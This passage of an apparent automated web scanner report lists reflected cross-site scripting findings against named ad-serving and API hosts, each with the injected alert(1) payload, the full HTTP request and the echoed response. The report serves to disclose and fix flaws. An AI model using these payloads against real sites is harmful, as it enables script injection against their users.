User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; ih="b!!!!R!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1CPe!!!!#=!=eG!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; vuday1=!!!!#N==#3P+HYn; pv1="b!!!!<!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~!#vtn~!$m%+!1CPe!%]D<!!!!$!?5%!$U*40!ZZ<)!!jYm!'iBj~~~~~~=!=eG~M.jTN"; bh="b!!!%,!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!-=!=eG!!0O<!!!!7=!=eG!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!3=!=eG!!J<E!!!!3=!=eG!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!4=!=eG!!q:E!!!!1=!=eG!!q<+!!!!2=!=eG!!q</!!!!2=!=eG!!q<3!!!!2=!=eG!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#=!=eG!!tjQ!!!!,<yq][!!ucq!!!!7=!=eG!!vRm!!!!-=!=eG!!vRq!!!!-=!=eG!!vRr!!!!-=!=eG!!vRw!!!!7=!=eG!!vRx!!!!-=!=eG!!vRy!!!!-=!=eG!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!-=!=eG!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!-=!=eH!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!-=!=eG!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!-=!=eG!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!-=!=eG!#MTF!!!!-=!=eG!#MTH!!!!-=!=eG!#MTI!!!!-=!=eG!#MTJ!!!!-=!=eG!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!3=!=eG!#SF3!!!!3=!=eG!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!-=!=eG!#UDP!!!!3=!=eG!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!-=!=eG!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!-=!=eG!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!-=!=eG!#tM)!!!!-=!=eG!#tn2!!!!-=!=eG!#uE=!!!!#<x9#K!#uJY!!!!3=!=eG!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!-=!=eG!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!0=!=eG!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!-=!=eG!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!-=!=eG!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!0=!=eG!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:01 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 13:33:01 GMT
Pragma: no-cache
Content-Length: 4350
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?33898"-alert(1)-"7c7717e2c00=1&Z=300x250&anmember=541&anprice=300&s=1588565&_salt=1432320579";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_pass
...[SNIP]...
2.40. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 859ac'%3balert(1)//eb6d7e629b3 was submitted in the admeld_adprovider_id parameter. This input was echoed as 859ac';alert(1)//eb6d7e629b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=78859ac'%3balert(1)//eb6d7e629b3&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:36 GMT
X-Name: rtb-o08
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=78859ac';alert(1)//eb6d7e629b3&external_user_id=0&expiration=1305466116" alt="" />');
2.41. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1bf5'%3balert(1)//29020a9a6e5 was submitted in the admeld_callback parameter. This input was echoed as f1bf5';alert(1)//29020a9a6e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchf1bf5'%3balert(1)//29020a9a6e5 HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:37 GMT
X-Name: rtb-o04
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/matchf1bf5';alert(1)//29020a9a6e5?admeld_adprovider_id=78&external_user_id=0&expiration=1305466117" alt="" />');
2.42. http://adserving2.cpxinteractive.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving2.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1ab8'-alert(1)-'9dbe414d80d was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250e1ab8'-alert(1)-'9dbe414d80d&section=1588565 HTTP/1.1
Host: adserving2.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:33:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:33:01 GMT
Content-Length: 778

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250e1ab8'-alert(1)-'9dbe414d80d&inv_code=1588565&referrer=http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanme
...[SNIP]...
2.43. http://adserving2.cpxinteractive.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving2.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57220"><script>alert(1)</script>2ef17f08d0b was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x25057220"><script>alert(1)</script>2ef17f08d0b&section=1588565 HTTP/1.1
Host: adserving2.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:32:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:32:57 GMT
Content-Length: 848

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x25057220"><script>alert(1)</script>2ef17f08d0b&inv_code=1588565&referr
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=300x25057220"><script>alert(1)</script>2ef17f08d0b&s=1588565&t=2" target="parent">
...[SNIP]...
2.44. http://adserving2.cpxinteractive.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving2.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82137"><script>alert(1)</script>23748e7fa31 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=158856582137"><script>alert(1)</script>23748e7fa31 HTTP/1.1
Host: adserving2.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:33:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:33:04 GMT
Content-Length: 848

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250&inv_code=158856582137"><script>alert(1)</script>23748e7fa31&referr
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=300x250&s=158856582137"><script>alert(1)</script>23748e7fa31&t=2" target="parent">
...[SNIP]...
2.45. http://adserving2.cpxinteractive.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving2.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85a49'-alert(1)-'85e9fe16d09 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=158856585a49'-alert(1)-'85e9fe16d09 HTTP/1.1
Host: adserving2.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:33:08 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:33:08 GMT
Content-Length: 778

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250&inv_code=158856585a49'-alert(1)-'85e9fe16d09&referrer=http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anpr
...[SNIP]...
2.46. http://api.freebase.com/api/trans/image_thumb/en/apple_inc [maxheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/apple_inc

Issue detail

The value of the maxheight request parameter is copied into the HTML document as plain text between tags. The payload 1eb94<script>alert(1)</script>020c643f79e was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/apple_inc?maxwidth=32&maxheight=321eb94<script>alert(1)</script>020c643f79e&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:11 GMT
Server: Apache
X-Metaweb-Cost: cc=0.016, dt=0.027, mcs=0.0, mcu=0.0, nivcsw=1, tm=0.0, utime=0.015
Expires: Thu, 12 May 2011 13:31:12 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache02.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache02.p01.sjc1:8101;2011-05-12T13:31:11Z;0046
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "321eb94<script>alert(1)</script>020c643f79e"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache02.p01.sjc1:8101;2011-05-12T13:31:11Z;0046"
}
2.47. http://api.freebase.com/api/trans/image_thumb/en/apple_inc [maxwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/apple_inc

Issue detail

The value of the maxwidth request parameter is copied into the HTML document as plain text between tags. The payload 19c68<script>alert(1)</script>0b3c41db23c was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/apple_inc?maxwidth=3219c68<script>alert(1)</script>0b3c41db23c&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

